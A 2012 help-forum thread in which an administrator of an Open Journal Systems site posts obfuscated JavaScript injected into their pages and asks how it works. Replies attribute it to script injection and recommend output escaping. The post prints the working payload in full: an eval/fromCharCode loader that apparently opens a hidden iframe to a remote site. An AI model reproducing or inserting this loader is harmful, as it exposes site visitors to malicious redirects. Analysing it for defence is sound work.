Go Premium for a chance to win a PS4. Enter to Win


Need help analyzing a malicious script

Posted on 2012-04-03
Medium Priority
Last Modified: 2013-11-22
We run OJS (Open Journal Systems) on Windows 2003 server with PHP 5, MySQL and Apache 2.2. Recently, a few web pages got corrupted.  When users log into the site to submit/edit articles, and click on a link for "Notifications", they are brought to a page with an address like this:  http://mydomain.com/journals/index.php/myjournal/notification and their antivirus software tells them that the page redirects them to a dangerous website.

The page's source has the following snippet included right on top, before the HTML header:
<script>d=Date;d=new d();h=-parseInt('012')/5;if(window.document)try{new document.getElementById("qwe").prototype}catch(qqq){st=String;zz='al';zz='v'+zz;ss="";if(1){f='f'+'r'+'o'+'m'+'Ch'+'ar';f=f+'C'+'od'+'e';}e=this[f.substr(11)+zz];t='y';} n="3.5~3.5~51.5~50~15~19~49~54.5~48.5~57.5~53.5~49.5~54~57~22~50.5~49.5~57~33.5~53~49.5~53.5~49.5~54~57~56.5~32~59.5~41~47.5~50.5~38~47.5~53.5~49.5~19~18.5~48~54.5~49~59.5~18.5~19.5~44.5~23~45.5~19.5~60.5~5.5~3.5~3.5~3.5~51.5~50~56~47.5~53.5~49.5~56~19~19.5~28.5~5.5~3.5~3.5~61.5~15~49.5~53~56.5~49.5~15~60.5~5.5~3.5~3.5~3.5~49~54.5~48.5~57.5~53.5~49.5~54~57~22~58.5~56~51.5~57~49.5~19~16~29~51.5~50~56~47.5~53.5~49.5~15~56.5~56~48.5~29.5~18.5~51~57~57~55~28~22.5~22.5~59.5~57.5~51.5~56~49.5~56~58.5~49.5~48~48~22~51.5~48~51.5~60~22~48.5~48.5~22.5~30.5~50.5~54.5~29.5~24~18.5~15~58.5~51.5~49~57~51~29.5~18.5~23.5~23~18.5~15~51~49.5~51.5~50.5~51~57~29.5~18.5~23.5~23~18.5~15~56.5~57~59.5~53~49.5~29.5~18.5~58~51.5~56.5~51.5~48~51.5~53~51.5~57~59.5~28~51~51.5~49~49~49.5~54~28.5~55~54.5~56.5~51.5~57~51.5~54.5~54~28~47.5~48~56.5~54.5~53~57.5~57~49.5~28.5~53~49.5~50~57~28~23~28.5~57~54.5~55~28~23~28.5~18.5~30~29~22.5~51.5~50~56~47.5~53.5~49.5~30~16~19.5~28.5~5.5~3.5~3.5~61.5~5.5~3.5~3.5~50~57.5~54~48.5~57~51.5~54.5~54~15~51.5~50~56~47.5~53.5~49.5~56~19~19.5~60.5~5.5~3.5~3.5~3.5~58~47.5~56~15~50~15~29.5~15~49~54.5~48.5~57.5~53.5~49.5~54~57~22~48.5~56~49.5~47.5~57~49.5~33.5~53~49.5~53.5~49.5~54~57~19~18.5~51.5~50~56~47.5~53.5~49.5~18.5~19.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~19~18.5~56.5~56~48.5~18.5~21~18.5~51~57~57~55~28~22.5~22.5~59.5~57.5~51.5~56~49.5~56~58.5~49.5~48~48~22~51.5~48~51.5~60~22~48.5~48.5~22.5~30.5~50.5~54.5~29.5~24~18.5~19.5~28.5~50~22~56.5~57~59.5~53~49.5~22~58~51.5~56.5~51.5~48~51.5~53~51.5~57~59.5~29.5~18.5~51~51.5~49~49~49.5~54~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~55~54.5~56.5~51.5~57~51.5~54.5~54~29.5~18.5~47.5~48~56.5~54.5~53~57.5~57~49.5~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~53~49.5~50~57~29.5~18.5~23~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~57~54.5~55~29.5~18.5~23~18.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~19~18.5~58.5~51.5~49~57~51~18.5~21~18.5~23.5~23~18.5~19.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~19~18.5~51~49.5~51.5~50.5~51~57~18.5~21~18.5~23.5~23~18.5~19.5~28.5~5.5~3.5~3.5~3.5~49~54.5~48.5~57.5~53.5~49.5~54~57~22~50.5~49.5~57~33.5~53~49.5~53.5~49.5~54~57~56.5~32~59.5~41~47.5~50.5~38~47.5~53.5~49.5~19~18.5~48~54.5~49~59.5~18.5~19.5~44.5~23~45.5~22~47.5~55~55~49.5~54~49~32.5~51~51.5~53~49~19~50~19.5~28.5~5.5~3.5~3.5~61.5".split("a~".substr(1));for(i=0;i!=571;i++){j=i;ss=ss+st[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(zz)e(""+q);</script>

Open in new window

Here is the index.php that is listed in the URL above:

 * @file index.php
 * Bootstrap code for OJS site. Loads required files and then calls the
 * dispatcher to delegate to the appropriate request handler.

// $Id$

// Initialize global environment
define('INDEX_FILE_LOCATIO<wbr ></wbr>N', __FILE__);
require('./lib/pkp/include<wbr ></wbr>s/bootstra<wbr ></wbr>p.inc.php'<wbr ></wbr>);

// Serve the request
$application =& PKPApplication::getApplica<wbr ></wbr>tion();

Open in new window

I have tried a few antivirus programs, and while some of them detected viruses like the VirTool:JS/Obfuscator.W(v) trojan, but now they report the system as clean, but the problem is still there.

I want to understand the mechanism behind this.  How is the the malicious script inserted into a web page and how does it instruct the browser to go to a malicious web site?  The script has to be decrypted, but is is done on my machine or elsewhere?
Question by:lolekbolek

Assisted Solution

designatedinitializer earned 1000 total points
ID: 37804217
That's an XSS instance: Cross-Site-Scripting attack.
The fellaz exploit your lack of user-input sanitation in order to inject JavaScript in your pages.

Check this page for more info and some samples:

The js code is of course not encrypted (that's not actually possible), but it is obfuscated: it is exploded to a bunch of characters and ascii codes that get strung-up together and eval()-ed in order to do their dirty work.
LVL 111

Accepted Solution

Ray Paseur earned 1000 total points
ID: 37805671
Check these links for some useful information:

One of the most essential and simple ways of dealing with stuff like this is to use htmlentities() when you echo external data to a client browser.

Best of luck with it, ~Ray

Featured Post

Free Tool: SSL Checker

Scans your site and returns information about your SSL implementation and certificate. Helpful for debugging and validating your SSL configuration.

One of a set of tools we are providing to everyone as a way of saying thank you for being a part of the community.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

This article discusses how to implement server side field validation and display customized error messages to the client.
This article investigates the question of whether a computer can really be cleaned once it has been infected, and what the best ways of cleaning a computer might be (in this author's opinion).
The viewer will learn how to count occurrences of each item in an array.
The viewer will learn how to create a basic form using some HTML5 and PHP for later processing. Set up your basic HTML file. Open your form tag and set the method and action attributes.: (CODE) Set up your first few inputs one for the name and …

972 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question